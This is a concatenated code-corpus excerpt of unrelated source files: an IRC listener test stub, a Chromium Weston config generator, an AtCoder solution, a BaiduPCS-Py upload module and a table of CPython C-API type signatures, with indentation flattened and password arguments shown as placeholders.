# https://stackoverflow.com/questions/4465959/python-errno-98-address-already-in-use
allow_reuse_address = True
###############################################################################
# Testing code
def test(config):
pass
def main():
logging.basicConfig(format='%(asctime)s [%(name)15s] %(message)s', datefmt='%m/%d/%y %I:%M:%S %p', level=logging.DEBUG)
config = {'port': '6667', 'usessl': 'No', 'timeout': 10, 'servername': 'localhost' }
listener = IRCListener(config)
listener.start()
###########################################################################
# Run processing
import time
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
###########################################################################
# Run tests
test(config)
if __name__ == '__main__':
main()
| 1.851563 | 2 |
third_party/weston/generate_configs.py | zealoussnow/chromium | 14,668 | 12766394 | <gh_stars>1000+
#!/usr/bin/env python
#
# Copyright 2020 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Creates config files for building Weston."""
from __future__ import print_function
import os
import re
import shutil
import subprocess
import sys
import tempfile
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
CHROMIUM_ROOT_DIR = os.path.abspath(os.path.join(BASE_DIR, '..', '..'))
sys.path.append(os.path.join(CHROMIUM_ROOT_DIR, 'build'))
import gn_helpers
MESON = ['meson']
DEFAULT_BUILD_ARGS = [
'-Dbuild_tests=false',
'--buildtype', 'release',
'-Dbackend-drm-screencast-vaapi=false',
'-Dbackend-rdp=false',
'-Dxwayland=false',
'-Dcolor-management-lcms=false',
'-Dpipewire=false',
'-Dcolor-management-colord=false',
'-Dremoting=false',
'-Dsimple-dmabuf-drm=auto',
'-Dshell-ivi=false',
'-Ddemo-clients=false',
'-Dsimple-clients=egl',
'-Dlauncher-logind=false',
'-Dweston-launch=false',
'-Dscreenshare=false',
'-Dsystemd=false',
'-Dimage-jpeg=false',
'-Dimage-webp=false',
'-Dbackend-drm=false',
'-Dbackend-default=wayland'
]
def PrintAndCheckCall(argv, *args, **kwargs):
print('\n-------------------------------------------------\nRunning %s' %
' '.join(argv))
c = subprocess.check_call(argv, *args, **kwargs)
def RewriteFile(path, search_replace):
with open(path) as f:
contents = f.read()
with open(path, 'w') as f:
for search, replace in search_replace:
contents = re.sub(search, replace, contents)
# Cleanup trailing newlines.
f.write(contents.strip() + '\n')
def AddAttributeInConfig(path):
with open(path) as f:
contents = f.read()
with open(path, 'w') as f:
f.write(contents.strip() + '\n')
f.write('\n' + '__attribute__((visibility("default"))) int main(int argc, char* argv[]);' + '\n')
def CopyConfigsAndCleanup(config_dir, dest_dir):
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
shutil.copy(os.path.join(config_dir, 'config.h'), dest_dir)
shutil.rmtree(config_dir)
def RewriteGitFile(path, data):
with open(path, 'w') as f:
contents = data
# Cleanup trailing newlines.
f.write(contents.strip() + '\n')
def CopyGitConfigsAndCleanup(config_dir, dest_dir):
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
shutil.copy(os.path.join(config_dir, 'git-version.h'), dest_dir)
shutil.rmtree(config_dir)
def GenerateGitConfig(config_dir, env, special_args=[]):
temp_dir = tempfile.mkdtemp()
PrintAndCheckCall(
MESON + DEFAULT_BUILD_ARGS + special_args + [temp_dir],
cwd='src',
env=env)
label = subprocess.check_output(["git", "describe", "--always"]).strip()
label = label.decode("utf-8")
RewriteGitFile(
os.path.join(temp_dir, 'git-version.h'),
"#define BUILD_ID \"{label}\"".format(label=label))
CopyGitConfigsAndCleanup(temp_dir, config_dir)
def GenerateConfig(config_dir, env, special_args=[]):
temp_dir = tempfile.mkdtemp()
PrintAndCheckCall(
MESON + DEFAULT_BUILD_ARGS + special_args + [temp_dir],
cwd='src',
env=env)
CopyConfigsAndCleanup(temp_dir, config_dir)
def ChangeConfigPath():
configfile = os.path.join(BASE_DIR, "config/config.h")
DIRS = ["BINDIR",
"DATADIR",
"LIBEXECDIR",
"LIBWESTON_MODULEDIR",
"MODULEDIR"]
for dir in DIRS:
pattern = "#define {dir} \"/[a-zA-Z0-9\\-_/]+\"".format(dir=dir)
RewriteFile(configfile, [(pattern, "")])
# Add attribute in config.h to suppress all undefined symbol(function) warnings
AddAttributeInConfig(configfile)
def GenerateWestonVersion():
dirname = os.path.join(BASE_DIR, "version/libweston")
if not os.path.exists(dirname):
os.makedirs(dirname)
version_op_file = os.path.join(BASE_DIR, "version/libweston/version.h")
configfile = os.path.join(BASE_DIR, "config/config.h")
version_in_file = os.path.join(BASE_DIR, "src/include/libweston/version.h.in")
version_number = "0.0.0"
with open(configfile, 'r') as f:
for line in f:
if "PACKAGE_VERSION" in line:
package_version_list = (line.strip("\n")).split(" ")
version_number = package_version_list[-1]
version_number_list = (version_number.strip('"\n"')).split(".")
version_number_list.append(version_number.strip("\"\""))
VERSIONS = ["@WESTON_VERSION_MAJOR@", "@WESTON_VERSION_MINOR@",
"@WESTON_VERSION_MICRO@", "@WESTON_VERSION@"]
with open(version_in_file) as f:
contents = f.read()
for version, version_number in zip(VERSIONS, version_number_list):
pattern = version
repl_string = version_number
with open(version_op_file, 'w') as f:
contents = re.sub(pattern, repl_string, contents)
# Cleanup trailing newlines.
f.write(contents.strip() + '\n')
print("Created version.h file from version.h.in\n")
def RemoveUndesiredDefines():
configfile = os.path.join(BASE_DIR, "config/config.h")
# Weston doesn't have a meson option to avoid using memfd_create() method that was
# introduced in GLIBC 2.27. That results in weston failing to run on Xenial based bot as
# it has GLIBC 2.23, because this config might be generated on a system that has newer
# libc libraries that meson checks with has_function() method. Thus, explicitly rewrite
# the config to disable usage of that method.
RewriteFile(configfile, [("#define HAVE_MEMFD_CREATE .*", "")])
def main():
env = os.environ
env['CC'] = 'clang'
GenerateGitConfig('version', env)
GenerateConfig('config', env)
ChangeConfigPath()
RemoveUndesiredDefines()
GenerateWestonVersion()
if __name__ == '__main__':
main()
| 1.757813 | 2 |
Others/diverta/diverta2019/d.py | KATO-Hiro/AtCoder | 2 | 12766395 | # -*- coding: utf-8 -*-
def main():
n = int(input())
ans = 0
for i in range(1, int(n ** 0.5) + 1):
if n % i == 0 and (i ** 2) != n:
m = n // i - 1
if n // m == n % m:
ans += m
print(ans)
if __name__ == '__main__':
main()
| 3.4375 | 3 |
baidupcs_py/commands/upload.py | UVJkiNTQ/BaiduPCS-Py | 0 | 12766396 | <gh_stars>0
from typing import Optional, List, Tuple, IO
import os
import time
import functools
from io import BytesIO
from enum import Enum
from pathlib import Path
from threading import Semaphore
from concurrent.futures import ThreadPoolExecutor, as_completed
from baidupcs_py.baidupcs.errors import BaiduPCSError
from baidupcs_py.baidupcs import BaiduPCSApi, FromTo
from baidupcs_py.common import constant
from baidupcs_py.common.path import is_file, exists, walk
from baidupcs_py.common.event import KeyHandler, KeyboardMonitor
from baidupcs_py.common.constant import CPU_NUM
from baidupcs_py.common.concurrent import sure_release, retry
from baidupcs_py.common.progress_bar import _progress, progress_task_exists
from baidupcs_py.common.localstorage import save_rapid_upload_info
from baidupcs_py.common.io import (
total_len,
rapid_upload_params,
EncryptType,
reset_encrypt_io,
)
from baidupcs_py.commands.log import get_logger
from requests_toolbelt import MultipartEncoderMonitor
from rich.progress import TaskID
from rich.table import Table
from rich.box import SIMPLE
from rich.text import Text
from rich import print
logger = get_logger(__name__)
# If slice size >= 100M, the rate of uploading will be much lower.
DEFAULT_SLICE_SIZE = 30 * constant.OneM
UPLOAD_STOP = False
_rapiduploadinfo_file: Optional[str] = None
def _wait_start():
while True:
if UPLOAD_STOP:
time.sleep(1)
else:
break
def _toggle_stop(*args, **kwargs):
global UPLOAD_STOP
UPLOAD_STOP = not UPLOAD_STOP
if UPLOAD_STOP:
print("[i yellow]Uploading stop[/i yellow]")
else:
print("[i yellow]Uploading continue[/i yellow]")
# Pass "p" to toggle uploading start/stop
KeyboardMonitor.register(KeyHandler("p", callback=_toggle_stop))
def to_remotepath(sub_path: str, remotedir: str) -> str:
return (Path(remotedir) / sub_path).as_posix()
def from_tos(localpaths: List[str], remotedir: str) -> List[FromTo]:
"""Find all localpaths and their corresponded remotepath"""
ft: List[FromTo] = []
for localpath in localpaths:
if not exists(localpath):
continue
if is_file(localpath):
remotepath = to_remotepath(os.path.basename(localpath), remotedir)
ft.append(FromTo(localpath, remotepath))
else:
parents_num = max(len(Path(localpath).parts) - 1, 0)
for sub_path in walk(localpath):
relative_path = Path(*Path(sub_path).parts[parents_num:]).as_posix()
remotepath = to_remotepath(relative_path, remotedir)
ft.append(FromTo(sub_path, remotepath))
return ft
class UploadType(Enum):
"""Upload Type
One: Upload the slices of one file concurrently
Many: Upload files concurrently
"""
One = 1
Many = 2
def _handle_deadly_error(err, fail_count):
# If following errors occur, we need to re-upload
if isinstance(err, BaiduPCSError) and (
err.error_code == 31352 # commit superfile2 failed
or err.error_code == 31363 # block miss in superfile2
or err.error_code == 31062 # 文件名非法
):
logger.warning(
"Deadly error: %s, fail_count: %s",
err,
fail_count,
exc_info=err,
)
raise err
# remotedir must be a directory
def upload(
api: BaiduPCSApi,
from_to_list: List[FromTo],
upload_type: UploadType = UploadType.One,
ondup: str = "overwrite",
encrypt_password: bytes = b"",
encrypt_type: EncryptType = EncryptType.No,
max_workers: int = CPU_NUM,
slice_size: int = DEFAULT_SLICE_SIZE,
ignore_existing: bool = True,
show_progress: bool = True,
rapiduploadinfo_file: Optional[str] = None,
user_id: Optional[int] = None,
user_name: Optional[str] = None,
check_md5: bool = False,
):
"""Upload from_tos
Args:
upload_type (UploadType): the way of uploading.
max_workers (int): The number of concurrent workers.
slice_size (int): The size of slice for uploading slices.
ignore_existing (bool): Ignoring these localpath which of remotepath exist.
show_progress (bool): Show uploading progress.
check_md5 (bool): To fix the content md5 after `combine_slices`
`combine_slices` always does not return correct content md5. To fix it,
we need to use `rapid_upload_file` re-upload the content.
Warning, if content length is large, it could take some minutes,
e.g. it takes 5 minutes about 2GB.
"""
logger.debug(
"======== Uploading start ========\n-> UploadType: %s\n-> Size of from_to_list: %s",
upload_type,
len(from_to_list),
)
global _rapiduploadinfo_file
if _rapiduploadinfo_file is None:
_rapiduploadinfo_file = rapiduploadinfo_file
if upload_type == UploadType.One:
upload_one_by_one(
api,
from_to_list,
ondup,
max_workers=max_workers,
encrypt_password=<PASSWORD>,
encrypt_type=encrypt_type,
slice_size=slice_size,
ignore_existing=ignore_existing,
show_progress=show_progress,
user_id=user_id,
user_name=user_name,
check_md5=check_md5,
)
elif upload_type == UploadType.Many:
upload_many(
api,
from_to_list,
ondup,
max_workers=max_workers,
encrypt_password=<PASSWORD>,
encrypt_type=encrypt_type,
slice_size=slice_size,
ignore_existing=ignore_existing,
show_progress=show_progress,
user_id=user_id,
user_name=user_name,
check_md5=check_md5,
)
def _init_encrypt_io(
api: BaiduPCSApi,
localpath: str,
remotepath: str,
encrypt_password: bytes = b"",
encrypt_type: EncryptType = EncryptType.No,
ignore_existing: bool = True,
task_id: Optional[TaskID] = None,
) -> Optional[Tuple[IO, int, int, int]]:
assert exists(Path(localpath)), f"`{localpath}` does not exist"
if ignore_existing:
try:
if api.exists(remotepath):
print(f"`{remotepath}` already exists.")
logger.debug("`_init_encrypt_io`: remote file already exists")
if task_id is not None and progress_task_exists(task_id):
_progress.remove_task(task_id)
return None
except Exception as err:
if task_id is not None and progress_task_exists(task_id):
_progress.remove_task(task_id)
raise err
stat = Path(localpath).stat()
local_ctime, local_mtime = int(stat.st_ctime), int(stat.st_mtime)
encrypt_io = encrypt_type.encrypt_io(open(localpath, "rb"), encrypt_password)
# IO Length
encrypt_io_len = total_len(encrypt_io)
logger.debug(
"`_init_encrypt_io`: encrypt_type: %s, localpath: %s, remotepath: %s, encrypt_io_len: %s",
encrypt_type,
localpath,
remotepath,
encrypt_io_len,
)
return (encrypt_io, encrypt_io_len, local_ctime, local_mtime)
def _rapid_upload(
api: BaiduPCSApi,
localpath: str,
remotepath: str,
slice256k_md5: str,
content_md5: str,
content_crc32: int,
io_len: int,
local_ctime: int,
local_mtime: int,
ondup: str,
encrypt_password: bytes = b"",
encrypt_type: EncryptType = EncryptType.No,
task_id: Optional[TaskID] = None,
user_id: Optional[int] = None,
user_name: Optional[str] = None,
) -> bool:
logger.debug("`_rapid_upload`: rapid_upload starts")
try:
api.rapid_upload_file(
slice256k_md5,
content_md5,
0, # not needed
io_len,
remotepath,
local_ctime=local_ctime,
local_mtime=local_mtime,
ondup=ondup,
)
if _rapiduploadinfo_file:
save_rapid_upload_info(
_rapiduploadinfo_file,
slice256k_md5,
content_md5,
content_crc32,
io_len,
localpath=localpath,
remotepath=remotepath,
encrypt_password=<PASSWORD>_password,
encrypt_type=encrypt_type.value,
user_id=user_id,
user_name=user_name,
)
if task_id is not None and progress_task_exists(task_id):
_progress.update(task_id, completed=io_len)
_progress.remove_task(task_id)
logger.debug("`_rapid_upload`: rapid_upload success, task_id: %s", task_id)
return True
except BaiduPCSError as err:
logger.warning("`_rapid_upload`: rapid_upload fails")
if err.error_code != 31079: # 31079: '未找到文件MD5,请使用上传API上传整个文件。'
if task_id is not None and progress_task_exists(task_id):
_progress.remove_task(task_id)
logger.warning("`_rapid_upload`: unknown error: %s", err)
raise err
else:
logger.debug("`_rapid_upload`: %s, no exist in remote", localpath)
if task_id is not None and progress_task_exists(task_id):
_progress.reset(task_id)
return False
@retry(20, except_callback=_handle_deadly_error)
def _combine_slices(
api: BaiduPCSApi,
remotepath: str,
slice_md5s: List[str],
local_ctime: int,
local_mtime: int,
ondup: str,
):
api.combine_slices(
slice_md5s,
remotepath,
local_ctime=local_ctime,
local_mtime=local_mtime,
ondup=ondup,
)
def upload_one_by_one(
api: BaiduPCSApi,
from_to_list: List[FromTo],
ondup: str,
max_workers: int = CPU_NUM,
encrypt_password: bytes = b"",
encrypt_type: EncryptType = EncryptType.No,
slice_size: int = DEFAULT_SLICE_SIZE,
ignore_existing: bool = True,
show_progress: bool = True,
user_id: Optional[int] = None,
user_name: Optional[str] = None,
check_md5: bool = False,
):
"""Upload files one by one with uploading the slices concurrently"""
with _progress:
for from_to in from_to_list:
task_id = None
if show_progress:
task_id = _progress.add_task("upload", start=False, title=from_to.from_)
upload_file_concurrently(
api,
from_to,
ondup,
max_workers=max_workers,
encrypt_password=<PASSWORD>,
encrypt_type=encrypt_type,
slice_size=slice_size,
ignore_existing=ignore_existing,
task_id=task_id,
user_id=user_id,
user_name=user_name,
check_md5=check_md5,
)
logger.debug("======== Uploading end ========")
@retry(
-1,
except_callback=lambda err, fail_count: (
_handle_deadly_error(err, fail_count),
logger.warning(
"`upload_file_concurrently`: fails: error: %s, fail_count: %s",
err,
fail_count,
exc_info=err,
),
),
)
def upload_file_concurrently(
api: BaiduPCSApi,
from_to: FromTo,
ondup: str,
max_workers: int = CPU_NUM,
encrypt_password: bytes = b"",
encrypt_type: EncryptType = EncryptType.No,
slice_size: int = DEFAULT_SLICE_SIZE,
ignore_existing: bool = True,
task_id: Optional[TaskID] = None,
user_id: Optional[int] = None,
user_name: Optional[str] = None,
check_md5: bool = False,
):
"""Uploading one file by uploading it's slices concurrently"""
localpath, remotepath = from_to
info = _init_encrypt_io(
api,
localpath,
remotepath,
encrypt_password=<PASSWORD>,
encrypt_type=encrypt_type,
ignore_existing=ignore_existing,
task_id=task_id,
)
if not info:
return
encrypt_io, encrypt_io_len, local_ctime, local_mtime = info
# Progress bar
if task_id is not None and progress_task_exists(task_id):
_progress.update(task_id, total=encrypt_io_len)
_progress.start_task(task_id)
slice_completed = 0
slice_completeds = {} # current i-th index slice completed size
def callback_for_slice(idx: int, monitor: MultipartEncoderMonitor):
if task_id is not None and progress_task_exists(task_id):
slice_completeds[idx] = monitor.bytes_read
current_compledted: int = sum(list(slice_completeds.values()))
_progress.update(task_id, completed=slice_completed + current_compledted)
slice256k_md5 = ""
content_md5 = ""
content_crc32 = 0
io_len = 0
if encrypt_type == EncryptType.No and encrypt_io_len > 256 * constant.OneK:
# Rapid Upload
slice256k_md5, content_md5, content_crc32, io_len = rapid_upload_params(
encrypt_io
)
ok = _rapid_upload(
api,
localpath,
remotepath,
slice256k_md5,
content_md5,
content_crc32,
io_len,
local_ctime,
local_mtime,
ondup,
encrypt_password=<PASSWORD>,
encrypt_type=encrypt_type,
task_id=task_id,
user_id=user_id,
user_name=user_name,
)
if ok:
return
try:
# Upload file slice
logger.debug("`upload_file_concurrently`: upload_slice starts")
reset_encrypt_io(encrypt_io)
completed_slice_md5s = []
def upload_slice(item: Tuple[int, IO]):
idx, io = item
# Retry upload until success
slice_md5 = retry(
-1,
except_callback=lambda err, fail_count: (
_handle_deadly_error(err, fail_count),
io.seek(0, 0),
logger.warning(
"`upload_file_concurrently`: error: %s, fail_count: %s",
err,
fail_count,
exc_info=err,
),
_wait_start(),
),
)(api.upload_slice)(io, callback=functools.partial(callback_for_slice, idx))
slice_completeds.pop(idx)
completed_slice_md5s.append((idx, slice_md5))
nonlocal slice_completed
slice_completed += total_len(io)
semaphore = Semaphore(max_workers)
with ThreadPoolExecutor(max_workers=max_workers) as executor:
futs = []
offset = 0
idx = 0
while True:
semaphore.acquire()
size = min(slice_size, encrypt_io_len - offset)
if idx != 0 and size == 0:
break
data = encrypt_io.read(size)
io = BytesIO(data or b"")
fut = executor.submit(sure_release, semaphore, upload_slice, (idx, io))
futs.append(fut)
idx += 1
offset += size
as_completed(futs)
completed_slice_md5s.sort()
slice_md5s = [md5 for _, md5 in completed_slice_md5s]
# Combine slices
_combine_slices(
api,
remotepath,
slice_md5s,
local_ctime,
local_mtime,
ondup,
)
logger.debug(
"`upload_file_concurrently`: upload_slice and combine_slices success, task_id: %s",
task_id,
)
# `combine_slices` can not get right content md5.
# We need to check whether server updates by hand.
if check_md5:
_check_md5(
api,
localpath,
remotepath,
slice256k_md5,
content_md5,
content_crc32,
io_len,
encrypt_password=<PASSWORD>,
encrypt_type=encrypt_type.value,
user_id=user_id,
user_name=user_name,
)
if task_id is not None and progress_task_exists(task_id):
_progress.remove_task(task_id)
except Exception as err:
logger.warning("`upload_file_concurrently`: error: %s", err)
raise err
finally:
encrypt_io.close()
if task_id is not None and progress_task_exists(task_id):
_progress.reset(task_id)
def upload_many(
api: BaiduPCSApi,
from_to_list: List[FromTo],
ondup: str = "overwrite",
encrypt_password: bytes = b"",
encrypt_type: EncryptType = EncryptType.No,
max_workers: int = CPU_NUM,
slice_size: int = DEFAULT_SLICE_SIZE,
ignore_existing: bool = True,
show_progress: bool = True,
rapiduploadinfo_file: Optional[str] = None,
user_id: Optional[int] = None,
user_name: Optional[str] = None,
check_md5: bool = False,
):
"""Upload files concurrently that one file is with one connection"""
excepts = {}
semaphore = Semaphore(max_workers)
with _progress:
with ThreadPoolExecutor(max_workers=max_workers) as executor:
futs = {}
for idx, from_to in enumerate(from_to_list):
semaphore.acquire()
task_id = None
if show_progress:
task_id = _progress.add_task(
"upload", start=False, title=from_to.from_
)
logger.debug(
"`upload_many`: Upload: index: %s, task_id: %s", idx, task_id
)
fut = executor.submit(
sure_release,
semaphore,
upload_file,
api,
from_to,
ondup,
encrypt_password=<PASSWORD>,
encrypt_type=encrypt_type,
slice_size=slice_size,
ignore_existing=ignore_existing,
task_id=task_id,
user_id=user_id,
user_name=user_name,
check_md5=check_md5,
)
futs[fut] = from_to
for fut in as_completed(futs):
e = fut.exception()
if e is not None:
from_to = futs[fut]
excepts[from_to] = e
logger.debug("======== Uploading end ========")
# Summary
if excepts:
table = Table(title="Upload Error", box=SIMPLE, show_edge=False)
table.add_column("From", justify="left", overflow="fold")
table.add_column("To", justify="left", overflow="fold")
table.add_column("Error", justify="left")
for from_to, e in sorted(excepts.items()):
table.add_row(from_to.from_, Text(str(e), style="red"))
_progress.console.print(table)
@retry(
-1,
except_callback=lambda err, fail_count: (
_handle_deadly_error(err, fail_count),
logger.warning(
"`upload_file`: fails: error: %s, fail_count: %s",
err,
fail_count,
exc_info=err,
),
),
)
def upload_file(
api: BaiduPCSApi,
from_to: FromTo,
ondup: str,
encrypt_password: bytes = b"",
encrypt_type: EncryptType = EncryptType.No,
slice_size: int = DEFAULT_SLICE_SIZE,
ignore_existing: bool = True,
task_id: Optional[TaskID] = None,
user_id: Optional[int] = None,
user_name: Optional[str] = None,
check_md5: bool = False,
):
"""Upload one file with one connection"""
_wait_start()
localpath, remotepath = from_to
info = _init_encrypt_io(
api,
localpath,
remotepath,
encrypt_password=<PASSWORD>,
encrypt_type=encrypt_type,
ignore_existing=ignore_existing,
task_id=task_id,
)
if not info:
return
encrypt_io, encrypt_io_len, local_ctime, local_mtime = info
# Progress bar
if task_id is not None and progress_task_exists(task_id):
_progress.update(task_id, total=encrypt_io_len)
_progress.start_task(task_id)
slice_completed = 0
def callback_for_slice(monitor: MultipartEncoderMonitor):
if task_id is not None and progress_task_exists(task_id):
_progress.update(task_id, completed=slice_completed + monitor.bytes_read)
slice256k_md5 = ""
content_md5 = ""
content_crc32 = 0
io_len = 0
if encrypt_type == EncryptType.No and encrypt_io_len > 256 * constant.OneK:
# Rapid Upload
slice256k_md5, content_md5, content_crc32, io_len = rapid_upload_params(
encrypt_io
)
ok = _rapid_upload(
api,
localpath,
remotepath,
slice256k_md5,
content_md5,
content_crc32,
io_len,
local_ctime,
local_mtime,
ondup,
encrypt_password=<PASSWORD>,
encrypt_type=encrypt_type,
task_id=task_id,
user_id=user_id,
user_name=user_name,
)
if ok:
return
try:
# Upload file slice
logger.debug("`upload_file`: upload_slice starts")
slice_md5s = []
reset_encrypt_io(encrypt_io)
idx = 0
while True:
_wait_start()
logger.debug(
"`upload_file`: upload_slice: slice_completed: %s", slice_completed
)
size = min(slice_size, encrypt_io_len - slice_completed)
if idx != 0 and size == 0:
break
data = encrypt_io.read(size) or b""
io = BytesIO(data)
logger.debug(
"`upload_file`: upload_slice: size should be %s == %s", size, len(data)
)
# Retry upload until success
slice_md5 = retry(
-1,
except_callback=lambda err, fail_count: (
_handle_deadly_error(err, fail_count),
io.seek(0, 0),
logger.warning(
"`upload_file`: `upload_slice`: error: %s, fail_count: %s",
err,
fail_count,
exc_info=err,
),
_wait_start(),
),
)(api.upload_slice)(io, callback=callback_for_slice)
slice_md5s.append(slice_md5)
slice_completed += size
idx += 1
# Combine slices
_combine_slices(
api,
remotepath,
slice_md5s,
local_ctime,
local_mtime,
ondup,
)
logger.debug(
"`upload_file`: upload_slice and combine_slices success, task_id: %s",
task_id,
)
# `combine_slices` can not get right content md5.
# We need to check whether server updates by hand.
if check_md5:
_check_md5(
api,
localpath,
remotepath,
slice256k_md5,
content_md5,
content_crc32,
io_len,
encrypt_password=<PASSWORD>,
encrypt_type=encrypt_type.value,
user_id=user_id,
user_name=user_name,
)
if task_id is not None and progress_task_exists(task_id):
_progress.remove_task(task_id)
except Exception as err:
logger.warning("`upload_file`: error: %s", err)
raise err
finally:
encrypt_io.close()
if task_id is not None and progress_task_exists(task_id):
_progress.reset(task_id)
def _check_md5(
api: BaiduPCSApi,
localpath: str,
remotepath: str,
slice_md5: str,
content_md5: str,
content_crc32: int, # not needed
content_length: int,
encrypt_password: bytes = b"",
encrypt_type: str = "",
user_id: Optional[int] = None,
user_name: Optional[str] = None,
):
"""Fix remote content md5 with rapid upload
There is a delay for server to handle uploaded data after `combine_slices`,
so we retry fix it.
"""
i = 0
while True:
logger.debug(
f"`_check_md5`: retry: {i}: "
"slice_md5: %s, content_md5: %s, content_crc32: %s, io_len: %s, remotepath: %s",
slice_md5,
content_md5,
content_crc32,
content_length,
remotepath,
)
i += 1
try:
api.rapid_upload_file(
slice_md5,
content_md5,
content_crc32, # not needed
content_length,
remotepath,
ondup="overwrite",
)
logger.warning("`_check_md5`: successes")
if _rapiduploadinfo_file:
save_rapid_upload_info(
_rapiduploadinfo_file,
slice_md5,
content_md5,
content_crc32,
content_length,
localpath=localpath,
remotepath=remotepath,
encrypt_password=<PASSWORD>,
encrypt_type=encrypt_type,
user_id=user_id,
user_name=user_name,
)
return
except Exception as err:
logger.warning("`_check_md5`: fails: %s", err)
time.sleep(2)
continue
| 2 | 2 |
cppy/c_types.py | defgsus/cppy | 0 | 12766397 | """
Collection of lists and dicts representing types in the python C-API
"""
"""
CPython's function pointers as dict:
typename: (return_type, (args,))
"""
FUNCTIONS = {
"unaryfunc": ("PyObject*", ("PyObject*",)),
"binaryfunc": ("PyObject*", ("PyObject*", "PyObject*")),
"ternaryfunc": ("PyObject*", ("PyObject*", "PyObject*", "PyObject*")),
"inquiry": ("int", ("PyObject*",)),
"lenfunc": ("Py_ssize_t", ("PyObject*",)),
"ssizeargfunc": ("PyObject*", ("PyObject*", "Py_ssize_t")),
"ssizessizeargfunc": ("PyObject*", ("PyObject*", "Py_ssize_t", "Py_ssize_t")),
"ssizeobjargproc": ("int", ("PyObject*", "Py_ssize_t", "PyObject*")),
"ssizessizeobjargproc": ("int", ("PyObject*", "Py_ssize_t", "Py_ssize_t", "PyObject*")),
"objobjargproc": ("int", ("PyObject*", "PyObject*", "PyObject*")),
"freefunc": ("void", ("void*",)),
"destructor": ("void", ("PyObject*",)),
"printfunc": ("int", ("PyObject*", "FILE*", "int")),
"getattrfunc": ("PyObject*", ("PyObject*", "char*")),
"getattrofunc": ("PyObject*", ("PyObject*", "PyObject*")),
"setattrfunc": ("int", ("PyObject*", "char*", "PyObject*")),
"setattrofunc": ("int", ("PyObject*", "PyObject*", "PyObject*")),
"reprfunc": ("PyObject*", ("PyObject*",)),
"hashfunc": ("Py_hash_t", ("PyObject*",)),
"richcmpfunc": ("PyObject*", ("PyObject*", "PyObject*", "int")),
"getiterfunc": ("PyObject*", ("PyObject*",)),
"iternextfunc": ("PyObject*", ("PyObject*",)),
"descrgetfunc": ("PyObject*", ("PyObject*", "PyObject*", "PyObject*")),
"descrsetfunc": ("int", ("PyObject*", "PyObject*", "PyObject*")),
"initproc": ("int", ("PyObject*", "PyObject*", "PyObject*")),
"newfunc": ("PyObject*", ("struct _typeobject*", "PyObject*", "PyObject*")),
"allocfunc": ("PyObject*", ("struct _typeobject*", "Py_ssize_t")),
"getter": ("PyObject*", ("PyObject*", "void*")),
"setter": ("int", ("PyObject*", "PyObject*", "void*")),
"objobjproc": ("int", ("PyObject*", "PyObject*")),
"visitproc": ("int", ("PyObject*", "void*")),
"traverseproc": ("int", ("PyObject*", "visitproc", "void*")),
}
"""
All members of PyTypeObject (member_name, type)
"""
PyTypeObject = [
("tp_name", "const char*"),
("tp_basicsize", "Py_ssize_t"),
("tp_itemsize", "Py_ssize_t"),
("tp_dealloc", "destructor"),
("tp_print", "printfunc"),
("tp_getattr", "getattrfunc"),
("tp_setattr", "setattrfunc"),
("tp_reserved", "void*"),
("tp_repr", "reprfunc"),
("tp_as_number", "PyNumberMethods*"),
("tp_as_sequence", "PySequenceMethods*"),
("tp_as_mapping", "PyMappingMethods*"),
("tp_hash", "hashfunc"),
("tp_call", "ternaryfunc"),
("tp_str", "reprfunc"),
("tp_getattro", "getattrofunc"),
("tp_setattro", "setattrofunc"),
("tp_as_buffer", "PyBufferProcs*"),
("tp_flags", "unsigned long"),
("tp_doc", "const char*"),
("tp_traverse", "traverseproc"),
("tp_clear", "inquiry"),
("tp_richcompare", "richcmpfunc"),
("tp_weaklistoffset", "Py_ssize_t"),
("tp_iter", "getiterfunc"),
("tp_iternext", "iternextfunc"),
("tp_methods", "struct PyMethodDef*"),
("tp_members", "struct PyMemberDef*"),
("tp_getset", "struct PyGetSetDef*"),
("tp_base", "struct _typeobject*"),
("tp_dict", "PyObject*"),
("tp_descr_get", "descrgetfunc"),
("tp_descr_set", "descrsetfunc"),
("tp_dictoffset", "Py_ssize_t"),
("tp_init", "initproc"),
("tp_alloc", "allocfunc"),
("tp_new", "newfunc"),
("tp_free", "freefunc"),
("tp_is_gc", "inquiry"),
("tp_bases", "PyObject*"),
("tp_mro", "PyObject*"),
("tp_cache", "PyObject*"),
("tp_subclasses", "PyObject*"),
("tp_weaklist", "PyObject*"),
("tp_del", "destructor"),
("tp_version_tag", "unsigned int"),
("tp_finalize", "destructor"),
]
PyNumberMethods = [
("nb_add", "binaryfunc"),
("nb_subtract", "binaryfunc"),
("nb_multiply", "binaryfunc"),
("nb_remainder", "binaryfunc"),
("nb_divmod", "binaryfunc"),
("nb_power", "ternaryfunc"),
("nb_negative", "unaryfunc"),
("nb_positive", "unaryfunc"),
("nb_absolute", "unaryfunc"),
("nb_bool", "inquiry"),
("nb_invert", "unaryfunc"),
("nb_lshift", "binaryfunc"),
("nb_rshift", "binaryfunc"),
("nb_and", "binaryfunc"),
("nb_xor", "binaryfunc"),
("nb_or", "binaryfunc"),
("nb_int", "unaryfunc"),
("nb_reserved", "void*"),
("nb_float", "unaryfunc"),
("nb_inplace_add", "binaryfunc"),
("nb_inplace_subtract", "binaryfunc"),
("nb_inplace_multiply", "binaryfunc"),
("nb_inplace_remainder", "binaryfunc"),
("nb_inplace_power", "ternaryfunc"),
("nb_inplace_lshift", "binaryfunc"),
("nb_inplace_rshift", "binaryfunc"),
("nb_inplace_and", "binaryfunc"),
("nb_inplace_xor", "binaryfunc"),
("nb_inplace_or", "binaryfunc"),
("nb_floor_divide", "binaryfunc"),
("nb_true_divide", "binaryfunc"),
("nb_inplace_floor_divide", "binaryfunc"),
("nb_inplace_true_divide", "binaryfunc"),
("nb_index", "unaryfunc"),
]
PySequenceMethods = [
("sq_length", "lenfunc"),
("sq_concat", "binaryfunc"),
("sq_repeat", "ssizeargfunc"),
("sq_item", "ssizeargfunc"),
("was_sq_slice", "void*"),
("sq_ass_item", "ssizeobjargproc"),
("was_sq_ass_slice", "void*"),
("sq_contains", "objobjproc"),
("sq_inplace_concat", "binaryfunc"),
("sq_inplace_repeat", "ssizeargfunc"),
]
PyMappingMethods = [
("mp_length", "lenfunc"),
("mp_subscript", "binaryfunc"),
("mp_ass_subscript", "objobjargproc"),
]
PyBufferProcs = [
("bf_getbuffer", "getbufferproc"),
